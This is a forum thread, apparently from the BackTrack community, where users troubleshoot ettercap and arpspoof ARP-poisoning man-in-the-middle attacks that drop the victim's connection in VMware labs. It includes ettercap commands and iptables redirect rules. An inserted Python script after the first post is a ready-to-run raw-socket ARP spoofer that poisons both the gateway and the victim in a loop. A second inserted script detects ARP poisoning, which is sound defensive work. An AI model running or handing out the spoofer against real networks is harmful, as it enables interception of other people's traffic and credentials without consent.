
Thread: MitM attack causes victim connection loss

  1. #1
    Just burned his ISO
    Join Date
    Oct 2011
    Posts
    3

    Default MitM attack causes victim connection loss

    Whenever I perform a MitM attack through my tool of choice, whether it be Ettercap text mode or arpspoof, the victim VM (BT5R1) loses internet connection. I have searched this topic thoroughly but am obviously missing something. The attack is being performed by BT5R1 Gnome 64-bit on an identical VM (VMware) which is using a bridged connection that also replicates physical network state. This attack is being done via eth0 since I do not own an external USB wireless card.

    The commands I used for ettercap are as follows

    # ettercap -TQM ARP:REMOTE -i eth0 /10.0.0.1/ /10.0.0.2/

    10.0.0.1 being the gateway obviously and .2 being the victim VM

    I didn't enable IP forwarding for this due to ettercap's automation of it. I also tried with IP forwarding even though it's a bit redundant. In addition to IP forwarding, I've enabled iptables in etter.conf as well as dropping ec_uid/gid to 0 (I don't know what this does). I've also read in another thread to uncomment ipchains, which I also tried but to no avail. I've tried installing a different version of ettercap but got the same problem. And of course when I tried this attack with arpspoof, I enabled IP forwarding with echo "1" > /proc/sys/net/ipv4/ip_forward.

    Now, I have confirmed that the victim VM is in fact ARP poisoned via ARP tables and/or Wireshark. I just can't figure out why they lose connectivity.

    Any help would be appreciated. Sorry if I forgot to mention any other critical details that would help in assessing the problem.
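    What the `-M ARP:REMOTE` command above actually puts on the wire, as an added example that is not code from this thread or from ettercap: two unsolicited ARP replies, one telling the victim that the gateway IP lives at the attacker's MAC and one telling the gateway the same about the victim, re-sent every few seconds because caches expire, and then the truthful mappings on exit so both hosts recover. The gateway, victim and attacker MACs and the interface name are constructed lab values (the thread only gives the two IPs); sending needs Linux and root. The forwarding check is the caveat that matters here: once both ends believe the attacker's MAC, every packet between them lands on the attacker's box, and if that box is not forwarding, the victim's traffic dies right there.

```python
"""Spoofed ARP replies for a two-sided (ARP:REMOTE style) poison, stdlib only."""
import os
import socket
import struct
import time

ETH_P_ARP = 0x0806
ARP_REPLY = 2
IP_FORWARD = "/proc/sys/net/ipv4/ip_forward"


def mac_bytes(mac):
    """'00:0c:29:aa:bb:cc' or '00-0c-29-aa-bb-cc' -> 6 raw bytes."""
    raw = bytes.fromhex(mac.replace(":", "").replace("-", ""))
    if len(raw) != 6:
        raise ValueError(f"bad MAC {mac!r}")
    return raw


def build_arp_reply(claimed_ip, claimed_mac, target_ip, target_mac):
    """Ethernet frame carrying an ARP reply 'claimed_ip is at claimed_mac',
    unicast to target_mac. An unsolicited reply is enough for most stacks to
    overwrite their cache entry for claimed_ip."""
    eth = struct.pack("!6s6sH", mac_bytes(target_mac), mac_bytes(claimed_mac), ETH_P_ARP)
    arp = struct.pack(
        "!HHBBH6s4s6s4s",
        1, 0x0800, 6, 4, ARP_REPLY,                              # Ethernet/IPv4, opcode reply
        mac_bytes(claimed_mac), socket.inet_aton(claimed_ip),    # sender = the lie
        mac_bytes(target_mac), socket.inet_aton(target_ip),      # target = who we are lying to
    )
    return eth + arp


def parse_arp(frame):
    """Decode an Ethernet+ARP frame back into a dict (to verify what we built)."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    _, _, _, _, op, smac, sip, tmac, tip = struct.unpack("!HHBBH6s4s6s4s", frame[14:42])
    return {"op": op, "sender_mac": smac.hex(":"), "sender_ip": socket.inet_ntoa(sip),
            "target_mac": tmac.hex(":"), "target_ip": socket.inet_ntoa(tip)}


def remote_poison_frames(gateway_ip, gateway_mac, victim_ip, victim_mac, attacker_mac):
    """Both directions: victim learns gateway_ip -> attacker_mac and the gateway
    learns victim_ip -> attacker_mac, so traffic each way crosses the attacker."""
    return [
        build_arp_reply(gateway_ip, attacker_mac, victim_ip, victim_mac),
        build_arp_reply(victim_ip, attacker_mac, gateway_ip, gateway_mac),
    ]


def restore_frames(gateway_ip, gateway_mac, victim_ip, victim_mac):
    """The truthful mappings, sent on exit so both hosts recover without waiting
    for their caches to time out."""
    return [
        build_arp_reply(gateway_ip, gateway_mac, victim_ip, victim_mac),
        build_arp_reply(victim_ip, victim_mac, gateway_ip, gateway_mac),
    ]


def forwarding_enabled(path=IP_FORWARD):
    """True if the kernel will forward the packets we intercept. With this at 0
    the intercepted traffic is simply dropped on the attacker's box."""
    try:
        with open(path) as fh:
            return fh.read().strip() == "1"
    except OSError:
        return False


def send_loop(iface, frames, interval=2.0, rounds=None):
    """Re-send the frames every `interval` seconds; Linux raw sockets, root only."""
    if not forwarding_enabled():
        raise RuntimeError("ip_forward is 0: enable it or the victim will be blackholed")
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_P_ARP)) as s:
        s.bind((iface, 0))
        sent = 0
        while rounds is None or sent < rounds:
            for frame in frames:
                s.send(frame)
            sent += 1
            time.sleep(interval)


if __name__ == "__main__":
    # Constructed lab values: the IPs match the thread, the MACs are assumptions.
    GW, GW_MAC = "10.0.0.1", "00:11:22:33:44:55"
    VICTIM, VICTIM_MAC = "10.0.0.2", "00:0c:29:aa:bb:cc"
    ME = "00:0c:29:de:ad:01"
    poison = remote_poison_frames(GW, GW_MAC, VICTIM, VICTIM_MAC, ME)
    for f in poison:
        print(parse_arp(f))
    if os.geteuid() == 0:
        try:
            send_loop("eth0", poison, rounds=10)
        finally:
            send_loop("eth0", restore_frames(GW, GW_MAC, VICTIM, VICTIM_MAC), rounds=1)
```

Run without root it only prints the decoded frames; as root on Linux it poisons for ten rounds and then re-ARPs both hosts. Note that `send_loop` refuses to start while `ip_forward` is 0, which is the state ettercap leaves the flag in when it handles forwarding itself, so use it with arpspoof-style setups where you own forwarding, not alongside ettercap's own poisoning.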

  2. #2
    Senior Member ShadowMaster
    Join Date
    Jul 2011
    Location
    /root
    Posts
    189

    Default Re: MitM attack causes victim connection loss

    Based on your question I'm assuming you're testing on a wireless network. So, here's my experience with the same problem. I've successfully used the MitM attack from VMware BT5 to VMware Windows XP and 7 and physical Win7 via ethernet ports, but when I tried the same attack via physical wifi (but VMware's eth0 bridge), it failed miserably. So... I troubleshot. Long story short, if you used an external card, it should work fine. I have an ALFA AWUS036H, and I, the forums, and the rest of the general web recommend it highly. It only costs like 25-30 bucks. Not sure why it fails to do it the other way; I assume it's a problem with the..... Actually I have no idea.... But if you do find out why, please let me know.
    World Domination is such an ugly phrase. I prefer the term World Optimization.

  3. #3
    Just burned his ISO
    Join Date
    Oct 2011
    Posts
    3

    Default Re: MitM attack causes victim connection loss

    Quote Originally Posted by ShadowMaster View Post
    but when I tried the same attack via physical wifi (but VMware's eth0 bridge), it failed miserably.
    This attack was actually performed through eth0 on both the attacker and the victim. I disabled wireless on the attacker via the wireless switch.

  4. #4
    Just burned his ISO
    Join Date
    Oct 2011
    Posts
    1

    Default Re: MitM attack causes victim connection loss

    Quote Originally Posted by daquon View Post
    I confirmed that the victim VM is in fact ARP poisoned via ARP tables and/or Wireshark. I just can't figure out why they lose connectivity
    For what it's worth, I had the EXACT same issue using the same setup. I was able to use a physical host for my BackTrack system (not a VM) and ettercap MitM via ARP poisoning worked fine.

    From some preliminary searching around on Google I suspect VMware may be doing something in its network bridging of the BackTrack VM that is causing our problem.

    Here's another with a similar issue:
    http://www.backtrack-linux.org/forum...re-player.html

  5. #5
    Senior Member
    Join Date
    Jul 2011
    Posts
    236

    Default Re: MitM attack causes victim connection loss

    Quote Originally Posted by daquon View Post
    Whenever I perform a MitM attack through my tool of choice, whether it be Ettercap text mode or arpspoof, the victim VM (BT5R1) loses internet connection. I have searched this topic thoroughly but am obviously missing something. The attack is being performed by BT5R1 Gnome 64-bit on an identical VM (VMware) which is using a bridged connection that also replicates physical network state. This attack is being done via eth0 since I do not own an external USB wireless card.

    The commands I used for ettercap are as follows

    # ettercap -TQM ARP:REMOTE -i eth0 /10.0.0.1/ /10.0.0.2/

    10.0.0.1 being the gateway obviously and .2 being the victim VM

    I didn't enable IP forwarding for this due to ettercap's automation of it. I also tried with IP forwarding even though it's a bit redundant. In addition to IP forwarding, I've enabled iptables in etter.conf as well as dropping ec_uid/gid to 0 (I don't know what this does). I've also read in another thread to uncomment ipchains, which I also tried but to no avail. I've tried installing a different version of ettercap but got the same problem. And of course when I tried this attack with arpspoof, I enabled IP forwarding with echo "1" > /proc/sys/net/ipv4/ip_forward.

    Now, I have confirmed that the victim VM is in fact ARP poisoned via ARP tables and/or Wireshark. I just can't figure out why they lose connectivity.

    Any help would be appreciated. Sorry if I forgot to mention any other critical details that would help in assessing the problem.
    ec_uid/gid being 0 makes it run as root, so to speak, is my understanding (0 being the UID for root). Kind of pointless since you would want to do this as root anyway, but that is the answer to the question.

    As far as messing with etter.conf, I would recommend leaving ipchains commented and leaving iptables uncommented. You definitely want only ONE or the OTHER uncommented.

    I am so happy to finally see an intelligent thread where the author has actually READ the friggin man pages. Thank you!!! Yes, to affirm what you say: Ettercap in Offensive mode (the default) will automatically forward packets for you. Why other people have not grasped this concept is beyond me. As well, if you wanted to run ettercap and NOT have it forward packets for you, you could issue a -u within the syntax; the caveat here is that Unoffensive mode makes ettercap a sniffer and nothing more. It loses its ability to dynamically interact with the packet flow; granted, you should still be able to use certain plugins like autoadd and dns_spoof, but as far as the MITM goes, you lose that. What you want to avoid is forcing the kernel to reforward after you have issued the ettercap command, per the man pages; this might cause "double forwarding", confusing the heck out of the network. That being said, if you have not issued a -u within the syntax, DO NOT issue 1 to IP forwarding.

    As far as the victim losing connectivity, what do you mean??? Since it's a Physical Connection from what I understand, do you mean they lose their DHCP lease? I will edit this post a little later, gotta do some IRL stuff.
    V/r,
    Snafu
    Pffbt.. "I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it's because I screwed it up. Not because it doesn't like me... Or feels threatened by me.. Or thinks I'm a smart ass.."

  6. #6
    Very good friend of the forum maverik35
    Join Date
    Sep 2009
    Location
    Debian land
    Posts
    734

    Default Re: MitM attack causes victim connection loss

    Well, ettercap will forward packets even in non-offensive mode; just ettercap -Tqi ethX is enough to forward. It is specified in the man pages...
    Also in the man pages, it is said:
    ettercap needs root privileges to open the Link Layer sockets. After the initialization phase, the root privs are not needed anymore, so ettercap drops them to UID = 65535 (nobody). Since ettercap has to write (create) log files, it must be executed in a directory with the right permissions (e.g. /tmp/). If you want to drop privs to a different uid, you can export the environment variable EC_UID with the value of the uid you want to drop the privs to (e.g. export EC_UID=500) or set the correct parameter in the etter.conf file.
    So it needs to be root to open link layer sockets (layer 2 in the OSI model; please refer to it in the wiki). Once open, it has no need to be root, so you have to tell ettercap which UID the privileges are going to drop to. Why? Because ettercap has to write the log files. So you have to use your ID. Just open a terminal and type "id". It will probably say 1000.
    Why your ID? Because I'm the owner of the account, me, so I can have access to the logs. So change etter.conf to EC_UID = 1000 or whatever your ID is.

    I've set EC_UID to 0 and it avoids victim connections...

    Try it....

    Hope it helps...

  7. #7
    Senior Member
    Join Date
    Jul 2011
    Posts
    236

    Default Re: MitM attack causes victim connection loss

    Quote Originally Posted by maverik35 View Post
    Well, ettercap will forward packets even in non-offensive mode, just ettercap -Tqi ethX, that is enough to forward..It is specified in the man pages...
    ettercap -Tqui wlan0 will place ettercap in Unoffensive mode, therefore leaving the forwarding to the user. That is per the man pages. Aside from that, very nice explanation; I learned something from it.
    V/r,
    Snafu

  8. #8
    Just burned his ISO
    Join Date
    Oct 2011
    Posts
    3

    Default Re: MitM attack causes victim connection loss

    Quote Originally Posted by Snafu View Post
    As far as the victim losing connectivity, what do you mean??? Since it's a Physical Connection from what I understand, do you mean they lose their DHCP lease? I will edit this post a little later, gotta do some IRL stuff.
    Sorry for being too vague. The actual DHCP lease hasn't expired and remains active for the whole duration. I guess a better way to explain it would be that the connection 'times out'? When I try to load a page on the victim machine, it gets stuck at 'Looking up www.xyz.com'.

    Quote Originally Posted by maverik35 View Post
    So it needs to be root to open link layer sockets (layer 2 in the OSI model; please refer to it in the wiki). Once open, it has no need to be root, so you have to tell ettercap which UID the privileges are going to drop to. Why? Because ettercap has to write the log files. So you have to use your ID. Just open a terminal and type "id". It will probably say 1000.
    Why your ID? Because I'm the owner of the account, me, so I can have access to the logs. So change etter.conf to EC_UID = 1000 or whatever your ID is.
    I'm kind of confused about what you're trying to say. I understand the fact that ettercap needs to have root privileges to open the Data Link Layer (for the ARP protocol). But you say that after it has accomplished opening the Data Link layer, it needs to drop root privileges to your own ID (1000 being a non-root user?) because root privileges are unnecessary at this point. The thing is, most of us are running BT as root already, so our ID would be 0 (root). And you said that having the root privileges dropped to a root user avoids victim connections. Are you saying that I should be running ettercap in BT as a non-root user?

  9. #9
    Just burned their ISO
    Join Date
    Sep 2011
    Posts
    22

    Default Re: MitM attack causes victim connection loss

    Hmm. I've had the same issue and it's been driving me nuts.

    I've been able to get it to work intermittently.

    If I target a single IP, I get better results, but typically it still kills the connection.

    I had changed the UID in etter.conf to 0. And Ettercap disables IP forwarding upon starting. I've yet to determine if that really matters. Try:

    Code:
    echo 1 > /proc/sys/net/ipv4/ip_forward    # enable kernel forwarding before starting
    ettercap -Tq -M arp:remote // //          # text mode, quiet, poison every host against every host
    cat /proc/sys/net/ipv4/ip_forward         # read the flag back once ettercap has exited
    It's always gone back to 0 for me.

    As for IP Tables. Ettercap alters those too.

    The odd thing is, I've tried it via VMware Fusion in two ways: using a USB wifi adapter (AWUS036H) and using the bridged connection. I've had the bridged connection work, and I've had the USB connection work. I've even had ONE successful attempt using Ettercap on my Android (via VM) against a computer in our house. I've also tried natively on my Mac using MacPorts, installed and set up. I can sniff, but once I use MitM, the internet dies.

    There's gotta be a way to get this to work reliably. If anyone has anything else to recommend, please chime in.

  10. #10
    Just burned his ISO
    Join Date
    Dec 2011
    Posts
    1

    Unhappy Re: MitM attack causes victim connection loss

    I am getting this same problem. I am on a wired LAN which is behind a proxy and am using BT5 64-bit. Now when I launch ettercap
    ettercap -i eth0 -T -q -M arp:remote /victims_ip/ /gateway_ip/

    the victim's computer loses internet connectivity. I tried these lines

    redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

    in etter.conf and also tried setting ec_uid to 0, but still no luck. The victim's computer is running Windows 7. I checked the ARP table of the victim to see whether it was poisoned or not, using the command arp -a and looking for the MAC address associated with the gateway's IP address, and it was mine. Also, when I launch the plugin chk_poison it gives me no poisoning at all. I think my lappy is not forwarding the packets it is receiving.

    For this I tried setting ip_forward to 1 but it was of no use, as when I launch ettercap it automatically turns ip_forward off. Can anybody help me see what I am doing wrong??

    thank you
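    The `arp -a` check in the post above, done as code, as an added example that is not from this thread or from ettercap's chk_poison plugin. It parses an ARP cache dump from the victim (Windows `arp -a`, Linux `arp -a`/`arp -n` or `ip neigh` all match the same pattern) and reports three independent indicators: the gateway entry differs from a known-good MAC, the gateway entry equals the attacker's MAC, or one MAC claims several IP addresses, which is what a two-sided poison looks like from either end. The sample dumps are constructed; the attacker is placed at 10.0.0.3 and all MACs are assumptions, since the thread only names 10.0.0.1 and 10.0.0.2.

```python
"""Detect ARP cache poisoning from a host's ARP table dump."""
import re
from collections import defaultdict

# One IPv4 address followed, somewhere later on the same line, by a MAC in
# either 00-0c-29-... (Windows) or 00:0c:29:... (Linux) form. Header lines
# such as "Interface: 10.0.0.2 --- 0xb" carry no MAC and are skipped.
_ENTRY = re.compile(
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3}).*?"
    r"(?P<mac>(?:[0-9a-fA-F]{2}[:-]){5}[0-9a-fA-F]{2})"
)


def norm_mac(mac):
    return mac.lower().replace("-", ":")


def parse_arp_cache(text):
    """Return {ip: mac} from arp -a / arp -n / ip neigh style output."""
    table = {}
    for line in text.splitlines():
        m = _ENTRY.search(line)
        if m:
            table[m.group("ip")] = norm_mac(m.group("mac"))
    return table


def poison_report(table, gateway_ip, known_gateway_mac=None, attacker_mac=None):
    """List of human-readable findings; an empty list means nothing suspicious.
    known_gateway_mac is the defender's check, attacker_mac the pentester's."""
    findings = []
    gw_mac = table.get(gateway_ip)
    if gw_mac is None:
        findings.append(f"no ARP entry for gateway {gateway_ip}")
    else:
        if known_gateway_mac and gw_mac != norm_mac(known_gateway_mac):
            findings.append(f"gateway {gateway_ip} maps to {gw_mac}, "
                            f"expected {norm_mac(known_gateway_mac)}")
        if attacker_mac and gw_mac == norm_mac(attacker_mac):
            findings.append(f"gateway {gateway_ip} resolves to the attacker MAC {gw_mac}")
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        # broadcast and IPv4 multicast entries legitimately repeat; ignore them
        if mac != "ff:ff:ff:ff:ff:ff" and not mac.startswith("01:00:5e"):
            by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            findings.append(f"{mac} claims {len(ips)} addresses: {', '.join(sorted(ips))}")
    return findings


# Constructed sample: the victim (10.0.0.2) after a two-sided poison. The
# attacker at 10.0.0.3 now answers for the gateway as well.
WINDOWS_ARP_A = """\
Interface: 10.0.0.2 --- 0xb
  Internet Address      Physical Address      Type
  10.0.0.1              00-0c-29-de-ad-01     dynamic
  10.0.0.3              00-0c-29-de-ad-01     dynamic
  10.0.0.255            ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

# Constructed sample: the same host, clean, as `ip neigh` would show it.
LINUX_IP_NEIGH = """\
10.0.0.1 dev eth0 lladdr 00:11:22:33:44:55 REACHABLE
10.0.0.3 dev eth0 lladdr 00:0c:29:de:ad:01 STALE
"""

if __name__ == "__main__":
    for name, dump in (("poisoned", WINDOWS_ARP_A), ("clean", LINUX_IP_NEIGH)):
        report = poison_report(parse_arp_cache(dump), "10.0.0.1",
                               known_gateway_mac="00:11:22:33:44:55",
                               attacker_mac="00:0c:29:de:ad:01")
        print(name, "->", report or ["no indicators"])
```

The duplicate-MAC indicator is the one that works without any prior knowledge, which makes it the useful one for a defender: a legitimate host normally owns one address, so two IPs behind one MAC on the victim's table (or on the gateway's) is worth an alert, while the known-gateway comparison is the check the poster was doing by hand with `arp -a`.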

